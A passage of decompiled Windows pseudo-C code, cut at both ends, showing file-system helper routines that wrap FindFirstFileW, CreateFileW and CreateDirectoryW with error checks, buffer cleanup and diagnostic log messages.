				signed char _v630;
				char _v638;
				signed int _v642;
				char* _v646;
				signed char _v666;
				void* __ebp;
				signed int _t485;
				signed int _t486;
				signed int _t490;
				signed int _t496;
				signed int _t497;
				signed int _t499;
				void* _t503;
				signed int _t506;
				signed int _t512;
				signed int _t518;
				signed int _t521;
				signed int _t527;
				signed int _t529;
				signed int _t530;
				signed int _t535;
				signed int _t537;
				signed int _t538;
				signed int _t544;
				signed int _t551;
				signed int _t553;
				signed int _t554;
				signed int _t558;
				signed int _t565;
				signed int _t574;
				signed int _t581;
				void* _t585;
				signed int _t590;
				signed int _t598;
				void* _t601;
				void* _t603;
				signed int _t604;
				signed int _t611;
				void* _t615;
				short* _t624;
				signed int _t630;
				signed int _t634;
				signed int _t638;
				signed int _t642;
				short* _t650;
				signed int _t656;
				signed int _t660;
				signed int _t664;
				short* _t674;
				long _t683;
				intOrPtr _t687;
				signed int _t691;
				signed int _t695;
				signed int _t699;
				intOrPtr _t703;
				signed int _t704;
				short* _t712;
				intOrPtr _t721;
				intOrPtr _t725;
				intOrPtr _t729;
				intOrPtr _t733;
				signed char _t737;
				short* _t748;
				intOrPtr _t754;
				intOrPtr _t757;
				signed char _t761;
				char* _t765;
				void* _t769;
				short* _t777;
				intOrPtr _t786;
				signed char _t790;
				intOrPtr _t794;
				intOrPtr _t798;
				signed int _t802;
				void* _t806;
				void* _t807;
				signed int _t809;
				signed int _t811;
				signed int _t812;
				signed int _t823;
				signed int _t834;
				signed int _t840;
				signed int _t841;
				signed int _t842;
				signed int _t847;
				signed int _t853;
				signed int _t855;
				signed int _t859;
				signed int _t863;
				signed int _t864;
				short* _t865;
				signed int _t867;
				signed int _t873;
				signed int _t874;
				signed int _t875;
				signed int _t876;
				signed int _t881;
				signed int _t883;
				signed int _t888;
				signed int _t889;
				signed int _t890;
				signed int _t895;
				signed int _t896;
				signed int _t897;
				long _t905;
				intOrPtr _t906;
				signed int _t907;
				signed int _t908;
				signed int _t909;
				char _t917;
				intOrPtr _t918;
				intOrPtr _t919;
				intOrPtr _t920;
				signed char _t921;
				short _t926;
				signed char _t927;
				void* _t928;
				intOrPtr _t937;
				signed char _t938;
				intOrPtr _t939;
				intOrPtr _t940;
				signed int _t941;
				signed int _t943;
				signed int _t945;
				void* _t947;
				void* _t949;
				void* _t951;
				signed int _t952;
				signed int _t953;
				signed int _t954;
				signed int _t955;
				void* _t956;
				void* _t958;
				signed int _t959;
				void* _t960;
				signed int _t962;
				signed int _t963;
				signed int _t964;
				signed int _t966;
				void* _t967;
				signed int _t968;
				signed int _t969;
				signed int _t970;
				void* _t971;
				void* _t972;
				void* _t973;
				signed int _t974;
				signed int _t975;
				signed int _t976;
				void* _t977;
				void* _t978;
				void* _t979;
				signed int _t981;
				signed int _t982;
				signed int _t983;
				signed int _t984;
				signed int _t985;
				void* _t986;
				void* _t987;
				void* _t988;
				void* _t989;
				void* _t990;
				signed int _t992;
				signed int _t993;
				signed int _t994;
				signed int _t995;
				signed int _t996;
				void* _t997;
				void* _t998;
				void* _t999;
				void* _t1000;
				void* _t1001;
				signed int _t1002;
				signed int _t1003;
				signed int _t1004;
				void* _t1005;
				void* _t1006;
				signed int _t1008;
				signed int _t1009;
				signed int _t1010;
				signed int _t1011;
				signed int _t1012;
				void* _t1013;
				void* _t1014;
				void* _t1015;
				void* _t1016;
				void* _t1017;
				void** _t1019;
				void* _t1020;
				signed int _t1021;
				void* _t1022;
				signed int _t1023;
				void* _t1024;
				signed int _t1025;
				signed int _t1026;
				void* _t1030;
				void* _t1032;
				signed int _t1034;
				struct _WIN32_FIND_DATAW* _t1040;
				signed int _t1041;
				void* _t1042;
				long _t1043;
				signed int _t1044;
				void* _t1045;
				void* _t1047;
				signed char* _t1048;
				signed int _t1049;
				signed int _t1052;
				signed int _t1054;
				signed int _t1058;
				signed int _t1061;
				signed int _t1064;
				signed int _t1066;
				signed int _t1067;
				signed int _t1070;
				signed int _t1078;
				void* _t1079;
				signed int _t1084;
				signed int _t1085;
				signed int _t1091;
				signed int _t1092;
				signed int _t1102;
				void* _t1103;

				_t1125 = __fp0;
				_t806 = __ebx;
				_t1058 = _t1078;
				_push(0xffffffff);
				_push(0x12ec828);
				_push( *[fs:0x0]);
				_t1079 = _t1078 - 0x80;
				_t485 =  *0x1309018; // 0xedd8d3b4
				_t486 = _t485 ^ _t1058;
				_v20 = _t486;
				_push(__esi);
				_push(__edi);
				_push(_t486);
				 *[fs:0x0] =  &_v16;
				_t1019 = __edx;
				_t1040 = __ecx;
				_v8 = 0;
				if(__edx == 0 || __ecx == 0) {
					_t1041 = 0x57;
					goto L33;
				} else {
					 *((intOrPtr*)(__edx)) = 0xffffffff;
					_t928 = 0x250;
					_t765 = __ecx;
					do {
						 *_t765 = 0;
						_t765 = _t765 + 1;
						_t928 = _t928 - 1;
					} while (_t928 != 0);
					L012C3E70( &_a4, __edx, __edx, __ecx, __fp0);
					_t768 =  >=  ? _a4 :  &_a4;
					_t769 = FindFirstFileW( >=  ? _a4 :  &_a4, _t1040);
					 *_t1019 = _t769;
					if(_t769 != 0xffffffff) {
						L8:
						_t1041 = 0;
						goto L33;
					} else {
						_t1041 = GetLastError();
						if(_t1041 == 2 || _t1041 == 3) {
							if(_a28 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							L9:
							__eflags = _t1041;
							if(__eflags == 0) {
								L33:
								_t943 = _a24;
								if(_t943 < 8) {
									L37:
									 *[fs:0x0] = _v16;
									_pop(_t1020);
									_pop(_t1042);
									return E012CAE19(_t1041, _t806, _v20 ^ _t1058, _t943, _t1020, _t1042);
								} else {
									_t823 = _a4;
									_t943 = 2 + _t943 * 2;
									_t490 = _t823;
									if(_t943 < 0x1000) {
										L36:
										_push(_t943);
										E012CAE27(_t823);
										goto L37;
									} else {
										_t823 =  *(_t823 - 4);
										_t943 = _t943 + 0x23;
										if(_t490 - _t823 + 0xfffffffc > 0x1f) {
											goto L40;
										} else {
											goto L36;
										}
									}
								}
							} else {
								__eflags = _a32 - 1;
								if(__eflags != 0) {
									goto L33;
								} else {
									_t1019 = E012A88E0(_t806,  &_v140, _t1041, _t1019, _t1041);
									_v8 = 1;
									_t943 = _a20;
									_t823 = 0x7ffffffe - _t943;
									__eflags = 0x7ffffffe - 0x18;
									if(0x7ffffffe < 0x18) {
										E012A1D70(_t823);
										goto L39;
									} else {
										__eflags = _a24 - 8;
										_t775 =  >=  ? _a4 :  &_a4;
										E01299780( &_v68, _v144, _t823, L"FindFirstFile for path \'", 0x18,  >=  ? _a4 :  &_a4, _t943);
										_push(0xc);
										_v8 = 2;
										_t777 = E01299A40( &_v68, _t1125, L"\' returned: ");
										asm("movups xmm0, [eax]");
										asm("movups [ebp-0x58], xmm0");
										asm("movq xmm0, [eax+0x10]");
										asm("movq [ebp-0x48], xmm0");
										 *(_t777 + 0x10) = 0;
										 *(_t777 + 0x14) = 7;
										 *_t777 = 0;
										_push(_t1019);
										_v8 = 3;
										E012A6D40(_t806,  &_v116, _t1019, _v144,  &_v92);
										_v8 = 4;
										_v44 = 0;
										_v28 = 0;
										_v24 = 7;
										_v44 = 0;
										E012A1EE0(_t806,  &_v44, _t943, _t1019, _t1041, L"FindFirstFileAPIWrapper", 0x17);
										_push(0x80000000);
										_v8 = 5;
										_push( &_v116);
										_push( &_v44);
										E012A98F0(_t806, _t1019, _t1125, 3);
										_t1008 = _v24;
										__eflags = _t1008 - 8;
										if(_t1008 < 8) {
											L16:
											_t1009 = _v96;
											__eflags = _t1009 - 8;
											if(_t1009 < 8) {
												L20:
												_t1010 = _v72;
												__eflags = _t1010 - 8;
												if(_t1010 < 8) {
													L24:
													_t1011 = _v48;
													__eflags = _t1011 - 8;
													if(_t1011 < 8) {
														L28:
														_t1012 = _v120;
														_v52 = 0;
														_v48 = 7;
														_v68 = 0;
														__eflags = _t1012 - 8;
														if(__eflags < 0) {
															goto L33;
														} else {
															_t937 = _v140;
															_t1013 = 2 + _t1012 * 2;
															_t786 = _t937;
															__eflags = _t1013 - 0x1000;
															if(__eflags < 0) {
																L31:
																_push(_t1013);
																E012CAE27(_t937);
																_t1079 = _t1079 + 8;
																goto L33;
															} else {
																_t823 =  *(_t937 - 4);
																_t943 = _t1013 + 0x23;
																__eflags = _t786 - _t823 + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	goto L39;
																} else {
																	goto L31;
																}
															}
														}
													} else {
														_t938 = _v68;
														_t1014 = 2 + _t1011 * 2;
														_t790 = _t938;
														__eflags = _t1014 - 0x1000;
														if(_t1014 < 0x1000) {
															L27:
															_push(_t1014);
															E012CAE27(_t938);
															_t1079 = _t1079 + 8;
															goto L28;
														} else {
															_t823 =  *(_t938 - 4);
															_t943 = _t1014 + 0x23;
															__eflags = _t790 - _t823 + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																goto L39;
															} else {
																goto L27;
															}
														}
													}
												} else {
													_t939 = _v92;
													_t1015 = 2 + _t1010 * 2;
													_t794 = _t939;
													__eflags = _t1015 - 0x1000;
													if(_t1015 < 0x1000) {
														L23:
														_push(_t1015);
														E012CAE27(_t939);
														_t1079 = _t1079 + 8;
														goto L24;
													} else {
														_t823 =  *(_t939 - 4);
														_t943 = _t1015 + 0x23;
														__eflags = _t794 - _t823 + 0xfffffffc - 0x1f;
														if(__eflags > 0) {
															goto L39;
														} else {
															goto L23;
														}
													}
												}
											} else {
												_t940 = _v116;
												_t1016 = 2 + _t1009 * 2;
												_t798 = _t940;
												__eflags = _t1016 - 0x1000;
												if(_t1016 < 0x1000) {
													L19:
													_push(_t1016);
													E012CAE27(_t940);
													_t1079 = _t1079 + 8;
													goto L20;
												} else {
													_t823 =  *(_t940 - 4);
													_t943 = _t1016 + 0x23;
													__eflags = _t798 - _t823 + 0xfffffffc - 0x1f;
													if(__eflags > 0) {
														goto L39;
													} else {
														goto L19;
													}
												}
											}
										} else {
											_t941 = _v44;
											_t1017 = 2 + _t1008 * 2;
											_t802 = _t941;
											__eflags = _t1017 - 0x1000;
											if(_t1017 < 0x1000) {
												L15:
												_push(_t1017);
												E012CAE27(_t941);
												_t1079 = _t1079 + 8;
												goto L16;
											} else {
												_t823 =  *(_t941 - 4);
												_t943 = _t1017 + 0x23;
												__eflags = _t802 - _t823 + 0xfffffffc - 0x1f;
												if(__eflags > 0) {
													L39:
													E012CF35F(_t806, _t823, _t943, __eflags);
													L40:
													E012CF35F(_t806, _t823, _t943, __eflags);
													asm("int3");
													asm("int3");
													_push(_t806);
													_t807 = _t1079;
													_t1084 = (_t1079 - 0x00000008 & 0xfffffff8) + 4;
													_push(_t1058);
													_v164 =  *((intOrPtr*)(_t807 + 4));
													_t1061 = _t1084;
													_push(0xffffffff);
													_push(0x12ec8b3);
													_push( *[fs:0x0]);
													_push(_t807);
													_t1085 = _t1084 - 0x98;
													_t496 =  *0x1309018; // 0xedd8d3b4
													_t497 = _t496 ^ _t1061;
													_v188 = _t497;
													_push(_t1041);
													_push(_t1019);
													_push(_t497);
													 *[fs:0x0] =  &_v180;
													_v332 = _t943;
													_t499 = _t823;
													_v336 = _t499;
													_t1043 =  *(_t807 + 0x10);
													_t1021 =  *(_t807 + 0x28);
													_v328 =  *((intOrPtr*)(_t807 + 8));
													_v324 =  *((intOrPtr*)(_t807 + 0xc));
													_v320 =  *((intOrPtr*)(_t807 + 0x14));
													_v312 = _t1043;
													_v316 =  *((intOrPtr*)(_t807 + 0x18));
													_v172 = 0;
													__eflags = _t1021;
													if(_t1021 != 0) {
														 *_t1021 = 0;
													}
													__eflags = _t499;
													if(_t499 != 0) {
														L012C3E70(_t807 + 0x2c, _t943, _t1021, _t1043, _t1125);
														__eflags =  *(_t807 + 0x40) - 8;
														_t502 =  >=  ?  *(_t807 + 0x2c) : _t807 + 0x2c;
														_t503 = CreateFileW( >=  ?  *(_t807 + 0x2c) : _t807 + 0x2c, _v180, _v176, _v172, _t1043, _v168, _v164);
														 *_v184 = _t503;
														__eflags = _t503 - 0xffffffff;
														if(_t503 != 0xffffffff) {
															_t1044 = 0;
															__eflags = _t1021;
															if(_t1021 != 0) {
																_t703 = _v160;
																__eflags = _t703 - 2;
																if(_t703 == 2) {
																	L89:
																	 *_t1021 = 1;
																} else {
																	__eflags = _t703 - 4;
																	if(_t703 == 4) {
																		_t704 = GetLastError();
																		__eflags = _t704;
																		if(_t704 == 0) {
																			goto L89;
																		}
																	}
																}
															}
															goto L90;
														} else {
															_t1044 = GetLastError();
															__eflags = _t1044 - 2;
															if(_t1044 == 2) {
																L48:
																__eflags =  *((char*)(_t807 + 0x1c));
																if( *((char*)(_t807 + 0x1c)) == 0) {
																	goto L63;
																} else {
																	_t1044 = 0;
																	__eflags =  *((char*)(_t807 + 0x24));
																	if( *((char*)(_t807 + 0x24)) == 0) {
																		goto L90;
																	} else {
																		_t834 =  *(_t807 + 0x3c);
																		__eflags = 0x7ffffffe - _t834 - 6;
																		if(__eflags < 0) {
																			E012A1D70(_t834);
																			goto L96;
																		} else {
																			__eflags =  *(_t807 + 0x40) - 8;
																			_t746 =  >=  ?  *(_t807 + 0x2c) : _t807 + 0x2c;
																			E01299780( &_v108, _v160, _t834, L"File \'", 6,  >=  ?  *(_t807 + 0x2c) : _t807 + 0x2c, _t834);
																			_push(0x11);
																			_v20 = 1;
																			_t748 = E01299A40( &_v108, _t1125, L"\' does not exist.");
																			asm("movups xmm0, [eax]");
																			asm("movups [ebp-0x44], xmm0");
																			asm("movq xmm0, [eax+0x10]");
																			asm("movq [ebp-0x34], xmm0");
																			 *((intOrPtr*)(_t748 + 0x10)) = 0;
																			 *(_t748 + 0x14) = 7;
																			 *_t748 = 0;
																			_v20 = 2;
																			_v60 = 0;
																			_v44 = 0;
																			_v40 = 7;
																			_v60 = 0;
																			E012A1EE0(_t807,  &_v60, _t943, _t1021, 0, L"CreateFileAPIWrapper", 0x14);
																			_push(0x80000000);
																			_v20 = 3;
																			_push( &_v84);
																			_push( &_v60);
																			E012A98F0(_t807, _t1021, _t1125, 1);
																			_t1002 = _v40;
																			__eflags = _t1002 - 8;
																			if(_t1002 < 8) {
																				L55:
																				_t1003 = _v64;
																				__eflags = _t1003 - 8;
																				if(_t1003 < 8) {
																					L59:
																					_t1004 = _v88;
																					__eflags = _t1004 - 8;
																					if(_t1004 < 8) {
																						goto L90;
																					} else {
																						_t917 = _v108;
																						_t997 = 2 + _t1004 * 2;
																						_t754 = _t917;
																						__eflags = _t997 - 0x1000;
																						if(_t997 < 0x1000) {
																							goto L84;
																						} else {
																							_t834 =  *(_t917 - 4);
																							_t943 = _t997 + 0x23;
																							__eflags = _t754 - _t834 + 0xfffffffc - 0x1f;
																							if(__eflags > 0) {
																								goto L96;
																							} else {
																								goto L84;
																							}
																						}
																					}
																				} else {
																					_t926 = _v84;
																					_t1005 = 2 + _t1003 * 2;
																					_t757 = _t926;
																					__eflags = _t1005 - 0x1000;
																					if(_t1005 < 0x1000) {
																						L58:
																						_push(_t1005);
																						E012CAE27(_t926);
																						_t1085 = _t1085 + 8;
																						goto L59;
																					} else {
																						_t834 =  *(_t926 - 4);
																						_t943 = _t1005 + 0x23;
																						__eflags = _t757 - _t834 + 0xfffffffc - 0x1f;
																						if(__eflags > 0) {
																							goto L96;
																						} else {
																							goto L58;
																						}
																					}
																				}
																			} else {
																				_t927 = _v60;
																				_t1006 = 2 + _t1002 * 2;
																				_t761 = _t927;
																				__eflags = _t1006 - 0x1000;
																				if(_t1006 < 0x1000) {
																					L54:
																					_push(_t1006);
																					E012CAE27(_t927);
																					_t1085 = _t1085 + 8;
																					goto L55;
																				} else {
																					_t834 =  *(_t927 - 4);
																					_t943 = _t1006 + 0x23;
																					__eflags = _t761 - _t834 + 0xfffffffc - 0x1f;
																					if(__eflags > 0) {
																						L96:
																						E012CF35F(_t807, _t834, _t943, __eflags);
																						goto L97;
																					} else {
																						goto L54;
																					}
																				}
																			}
																		}
																	}
																}
															} else {
																__eflags = _t1044 - 3;
																if(_t1044 != 3) {
																	L63:
																	__eflags =  *((char*)(_t807 + 0x20));
																	if( *((char*)(_t807 + 0x20)) == 0) {
																		goto L90;
																	} else {
																		_t1021 = E012A88E0(_t807,  &_v156, _t1044, _t1021, _t1044);
																		_v20 = 4;
																		_t944 =  *(_t807 + 0x3c);
																		_t834 = 0x7ffffffe - _t944;
																		__eflags = 0x7ffffffe - 0x15;
																		if(0x7ffffffe < 0x15) {
																			L97:
																			E012A1D70(_t834);
																			goto L98;
																		} else {
																			__eflags =  *(_t807 + 0x40) - 8;
																			_t710 =  >=  ?  *(_t807 + 0x2c) : _t807 + 0x2c;
																			E01299780( &_v84, _v160, _t834, L"CreateFile for file \'", 0x15,  >=  ?  *(_t807 + 0x2c) : _t807 + 0x2c, _t944);
																			_push(0xc);
																			_v20 = 5;
																			_t712 = E01299A40( &_v84, _t1125, L"\' returned: ");
																			asm("movups xmm0, [eax]");
																			asm("movups [ebp-0x5c], xmm0");
																			asm("movq xmm0, [eax+0x10]");
																			asm("movq [ebp-0x4c], xmm0");
																			 *(_t712 + 0x10) = 0;
																			 *(_t712 + 0x14) = 7;
																			 *_t712 = 0;
																			_push(_t1021);
																			_v20 = 6;
																			E012A6D40(_t807,  &_v132, _t1021, _v160,  &_v108);
																			_v20 = 7;
																			_v60 = 0;
																			_v44 = 0;
																			_v40 = 7;
																			_v60 = 0;
																			E012A1EE0(_t807,  &_v60, _t944, _t1021, _t1044, L"CreateFileAPIWrapper", 0x14);
																			_push(0x80000000);
																			_v20 = 8;
																			_push( &_v132);
																			_push( &_v60);
																			E012A98F0(_t807, _t1021, _t1125, 3);
																			_t992 = _v40;
																			__eflags = _t992 - 8;
																			if(_t992 < 8) {
																				L69:
																				_t993 = _v112;
																				__eflags = _t993 - 8;
																				if(_t993 < 8) {
																					L73:
																					_t994 = _v88;
																					__eflags = _t994 - 8;
																					if(_t994 < 8) {
																						L77:
																						_t995 = _v64;
																						__eflags = _t995 - 8;
																						if(_t995 < 8) {
																							L81:
																							_t996 = _v136;
																							_v68 = 0;
																							_v64 = 7;
																							_v84 = 0;
																							__eflags = _t996 - 8;
																							if(_t996 < 8) {
																								goto L90;
																							} else {
																								_t917 = _v156;
																								_t997 = 2 + _t996 * 2;
																								_t721 = _t917;
																								__eflags = _t997 - 0x1000;
																								if(_t997 < 0x1000) {
																									L84:
																									_push(_t997);
																									E012CAE27(_t917);
																									_t1085 = _t1085 + 8;
																									goto L90;
																								} else {
																									_t834 =  *(_t917 - 4);
																									_t944 = _t997 + 0x23;
																									__eflags = _t721 - _t834 + 0xfffffffc - 0x1f;
																									if(__eflags > 0) {
																										goto L98;
																									} else {
																										goto L84;
																									}
																								}
																							}
																						} else {
																							_t918 = _v84;
																							_t998 = 2 + _t995 * 2;
																							_t725 = _t918;
																							__eflags = _t998 - 0x1000;
																							if(_t998 < 0x1000) {
																								L80:
																								_push(_t998);
																								E012CAE27(_t918);
																								_t1085 = _t1085 + 8;
																								goto L81;
																							} else {
																								_t834 =  *(_t918 - 4);
																								_t944 = _t998 + 0x23;
																								__eflags = _t725 - _t834 + 0xfffffffc - 0x1f;
																								if(__eflags > 0) {
																									goto L98;
																								} else {
																									goto L80;
																								}
																							}
																						}
																					} else {
																						_t919 = _v108;
																						_t999 = 2 + _t994 * 2;
																						_t729 = _t919;
																						__eflags = _t999 - 0x1000;
																						if(_t999 < 0x1000) {
																							L76:
																							_push(_t999);
																							E012CAE27(_t919);
																							_t1085 = _t1085 + 8;
																							goto L77;
																						} else {
																							_t834 =  *(_t919 - 4);
																							_t944 = _t999 + 0x23;
																							__eflags = _t729 - _t834 + 0xfffffffc - 0x1f;
																							if(__eflags > 0) {
																								goto L98;
																							} else {
																								goto L76;
																							}
																						}
																					}
																				} else {
																					_t920 = _v132;
																					_t1000 = 2 + _t993 * 2;
																					_t733 = _t920;
																					__eflags = _t1000 - 0x1000;
																					if(_t1000 < 0x1000) {
																						L72:
																						_push(_t1000);
																						E012CAE27(_t920);
																						_t1085 = _t1085 + 8;
																						goto L73;
																					} else {
																						_t834 =  *(_t920 - 4);
																						_t944 = _t1000 + 0x23;
																						__eflags = _t733 - _t834 + 0xfffffffc - 0x1f;
																						if(__eflags > 0) {
																							goto L98;
																						} else {
																							goto L72;
																						}
																					}
																				}
																			} else {
																				_t921 = _v60;
																				_t1001 = 2 + _t992 * 2;
																				_t737 = _t921;
																				__eflags = _t1001 - 0x1000;
																				if(_t1001 < 0x1000) {
																					L68:
																					_push(_t1001);
																					E012CAE27(_t921);
																					_t1085 = _t1085 + 8;
																					goto L69;
																				} else {
																					_t834 =  *(_t921 - 4);
																					_t944 = _t1001 + 0x23;
																					__eflags = _t737 - _t834 + 0xfffffffc - 0x1f;
																					if(__eflags > 0) {
																						L98:
																						E012CF35F(_t807, _t834, _t944, __eflags);
																						goto L99;
																					} else {
																						goto L68;
																					}
																				}
																			}
																		}
																	}
																} else {
																	goto L48;
																}
															}
														}
													} else {
														_t1044 = _t499 + 0x57;
														L90:
														_t944 =  *(_t807 + 0x40);
														__eflags = _t944 - 8;
														if(_t944 < 8) {
															L94:
															 *[fs:0x0] = _v28;
															_pop(_t1022);
															_pop(_t1045);
															__eflags = _v36 ^ _t1061;
															return E012CAE19(_t1044, _t807, _v36 ^ _t1061, _t944, _t1022, _t1045);
														} else {
															_t834 =  *(_t807 + 0x2c);
															_t944 = 2 + _t944 * 2;
															_t506 = _t834;
															__eflags = _t944 - 0x1000;
															if(_t944 < 0x1000) {
																L93:
																_push(_t944);
																E012CAE27(_t834);
																goto L94;
															} else {
																_t834 =  *(_t834 - 4);
																_t944 = _t944 + 0x23;
																__eflags = _t506 - _t834 + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	L99:
																	E012CF35F(_t807, _t834, _t944, __eflags);
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	_push(_t807);
																	_t809 = _t1085;
																	_t1091 = (_t1085 - 0x00000008 & 0xfffffff8) + 4;
																	_push(_t1061);
																	_v356 =  *((intOrPtr*)(_t809 + 4));
																	_t1064 = _t1091;
																	_push(0xffffffff);
																	_push(0x12ec94b);
																	_push( *[fs:0x0]);
																	_push(_t809);
																	_t1092 = _t1091 - 0x88;
																	_t512 =  *0x1309018; // 0xedd8d3b4
																	_v380 = _t512 ^ _t1064;
																	 *[fs:0x0] =  &_v372;
																	_v501 = _t944;
																	_v502 = _t834;
																	_v364 = 0;
																	_t1023 = 0;
																	L012C3E70(_t809 + 8, _t944, 0, _t1044, _t1125, _t512 ^ _t1064, _t1021, _t1044);
																	__eflags =  *(_t809 + 0x1c) - 8;
																	_t517 =  >=  ?  *(_t809 + 8) : _t809 + 8;
																	_t518 = CreateDirectoryW( >=  ?  *(_t809 + 8) : _t809 + 8, 0);
																	__eflags = _t518;
																	if(_t518 != 0) {
																		L140:
																		__eflags = _v169;
																		if(_v169 == 0) {
																			goto L155;
																		} else {
																			_t840 =  *(_t809 + 0x18);
																			__eflags = 0x7ffffffe - _t840 - 0x17;
																			if(__eflags < 0) {
																				goto L164;
																			} else {
																				__eflags =  *(_t809 + 0x1c) - 8;
																				_t622 =  >=  ?  *(_t809 + 8) : _t809 + 8;
																				E01299780( &_v120, _v174, _t840, L"Created the directory \'", 0x17,  >=  ?  *(_t809 + 8) : _t809 + 8, _t840);
																				_push(1);
																				_v32 = 6;
																				_t624 = E01299A40( &_v120, _t1125, "\'");
																				asm("movups xmm0, [eax]");
																				asm("movups [ebp-0x44], xmm0");
																				asm("movq xmm0, [eax+0x10]");
																				asm("movq [ebp-0x34], xmm0");
																				 *(_t624 + 0x10) = 0;
																				 *(_t624 + 0x14) = 7;
																				 *_t624 = 0;
																				_v32 = 7;
																				_v72 = 0;
																				_v56 = 0;
																				_v52 = 7;
																				_v72 = 0;
																				E012A1EE0(_t809,  &_v72, _t944, _t1023, _t1044, L"CreateDirectoryAPIWrapper", 0x19);
																				_push(0x80000000);
																				_v32 = 8;
																				_push( &_v96);
																				_push( &_v72);
																				E012A98F0(_t809, _t1023, _t1125, 1);
																				_t968 = _v52;
																				__eflags = _t968 - 8;
																				if(_t968 < 8) {
																					L146:
																					_t969 = _v76;
																					__eflags = _t969 - 8;
																					if(_t969 < 8) {
																						L150:
																						_t970 = _v100;
																						__eflags = _t970 - 8;
																						if(_t970 < 8) {
																							goto L155;
																						} else {
																							_t888 = _v120;
																							_t971 = 2 + _t970 * 2;
																							_t630 = _t888;
																							__eflags = _t971 - 0x1000;
																							if(_t971 < 0x1000) {
																								L153:
																								_push(_t971);
																								E012CAE27(_t888);
																								goto L154;
																							} else {
																								_t840 =  *(_t888 - 4);
																								_t944 = _t971 + 0x23;
																								__eflags = _t630 - _t840 + 0xfffffffc - 0x1f;
																								if(__eflags > 0) {
																									goto L165;
																								} else {
																									goto L153;
																								}
																							}
																						}
																					} else {
																						_t889 = _v96;
																						_t972 = 2 + _t969 * 2;
																						_t634 = _t889;
																						__eflags = _t972 - 0x1000;
																						if(_t972 < 0x1000) {
																							L149:
																							_push(_t972);
																							E012CAE27(_t889);
																							_t1092 = _t1092 + 8;
																							goto L150;
																						} else {
																							_t840 =  *(_t889 - 4);
																							_t944 = _t972 + 0x23;
																							__eflags = _t634 - _t840 + 0xfffffffc - 0x1f;
																							if(__eflags > 0) {
																								goto L165;
																							} else {
																								goto L149;
																							}
																						}
																					}
																				} else {
																					_t890 = _v72;
																					_t973 = 2 + _t968 * 2;
																					_t638 = _t890;
																					__eflags = _t973 - 0x1000;
																					if(_t973 < 0x1000) {
																						L145:
																						_push(_t973);
																						E012CAE27(_t890);
																						_t1092 = _t1092 + 8;
																						goto L146;
																					} else {
																						_t840 =  *(_t890 - 4);
																						_t944 = _t973 + 0x23;
																						__eflags = _t638 - _t840 + 0xfffffffc - 0x1f;
																						if(__eflags > 0) {
																							goto L165;
																						} else {
																							goto L145;
																						}
																					}
																				}
																			}
																		}
																	} else {
																		_t642 = GetLastError();
																		_t1044 = _t642;
																		_t1023 = _t642;
																		__eflags = _t1044;
																		if(_t1044 == 0) {
																			goto L140;
																		} else {
																			__eflags = _t1044 - 0xb7;
																			if(_t1044 == 0xb7) {
																				__eflags = _v169;
																				if(_v169 == 0) {
																					goto L155;
																				} else {
																					_t840 =  *(_t809 + 0x18);
																					__eflags = 0x7ffffffe - _t840 - 0x1b;
																					if(__eflags < 0) {
																						goto L162;
																					} else {
																						__eflags =  *(_t809 + 0x1c) - 8;
																						_t648 =  >=  ?  *(_t809 + 8) : _t809 + 8;
																						E01299780( &_v120, _v174, _t840, L"Directory already exists: \'", 0x1b,  >=  ?  *(_t809 + 8) : _t809 + 8, _t840);
																						_push(1);
																						_v32 = 9;
																						_t650 = E01299A40( &_v120, _t1125, "\'");
																						asm("movups xmm0, [eax]");
																						asm("movups [ebp-0x44], xmm0");
																						asm("movq xmm0, [eax+0x10]");
																						asm("movq [ebp-0x34], xmm0");
																						 *(_t650 + 0x10) = 0;
																						 *(_t650 + 0x14) = 7;
																						 *_t650 = 0;
																						_v32 = 0xa;
																						_v72 = 0;
																						_v56 = 0;
																						_v52 = 7;
																						_v72 = 0;
																						E012A1EE0(_t809,  &_v72, _t944, _t1023, _t1044, L"CreateDirectoryAPIWrapper", 0x19);
																						_push(0x80000000);
																						_v32 = 0xb;
																						_push( &_v96);
																						_push( &_v72);
																						E012A98F0(_t809, _t1023, _t1125, 0);
																						_t974 = _v52;
																						__eflags = _t974 - 8;
																						if(_t974 < 8) {
																							L132:
																							_t975 = _v76;
																							__eflags = _t975 - 8;
																							if(_t975 < 8) {
																								L136:
																								_t976 = _v100;
																								_t1023 = _t1044;
																								__eflags = _t976 - 8;
																								if(_t976 < 8) {
																									goto L155;
																								} else {
																									_t895 = _v120;
																									_t977 = 2 + _t976 * 2;
																									_t656 = _t895;
																									__eflags = _t977 - 0x1000;
																									if(_t977 < 0x1000) {
																										L139:
																										_push(_t977);
																										E012CAE27(_t895);
																										_t1023 = _t1044;
																										L154:
																										_t1092 = _t1092 + 8;
																										goto L155;
																									} else {
																										_t840 =  *(_t895 - 4);
																										_t944 = _t977 + 0x23;
																										__eflags = _t656 - _t840 + 0xfffffffc - 0x1f;
																										if(__eflags > 0) {
																											goto L163;
																										} else {
																											goto L139;
																										}
																									}
																								}
																							} else {
																								_t896 = _v96;
																								_t978 = 2 + _t975 * 2;
																								_t660 = _t896;
																								__eflags = _t978 - 0x1000;
																								if(_t978 < 0x1000) {
																									L135:
																									_push(_t978);
																									E012CAE27(_t896);
																									_t1092 = _t1092 + 8;
																									goto L136;
																								} else {
																									_t840 =  *(_t896 - 4);
																									_t944 = _t978 + 0x23;
																									__eflags = _t660 - _t840 + 0xfffffffc - 0x1f;
																									if(__eflags > 0) {
																										goto L163;
																									} else {
																										goto L135;
																									}
																								}
																							}
																						} else {
																							_t897 = _v72;
																							_t979 = 2 + _t974 * 2;
																							_t664 = _t897;
																							__eflags = _t979 - 0x1000;
																							if(_t979 < 0x1000) {
																								L131:
																								_push(_t979);
																								E012CAE27(_t897);
																								_t1092 = _t1092 + 8;
																								goto L132;
																							} else {
																								_t840 =  *(_t897 - 4);
																								_t944 = _t979 + 0x23;
																								__eflags = _t664 - _t840 + 0xfffffffc - 0x1f;
																								if(__eflags > 0) {
																									goto L163;
																								} else {
																									goto L131;
																								}
																							}
																						}
																					}
																				}
																			} else {
																				__eflags = _v170;
																				if(_v170 == 0) {
																					L125:
																					_t1023 = _t1044;
																					L155:
																					_t945 =  *(_t809 + 0x1c);
																					__eflags = _t1023 - 0xb7;
																					_t1044 =  !=  ? _t1023 : 0;
																					__eflags = _t945 - 8;
																					if(_t945 < 8) {
																						L159:
																						 *[fs:0x0] = _v40;
																						_pop(_t1024);
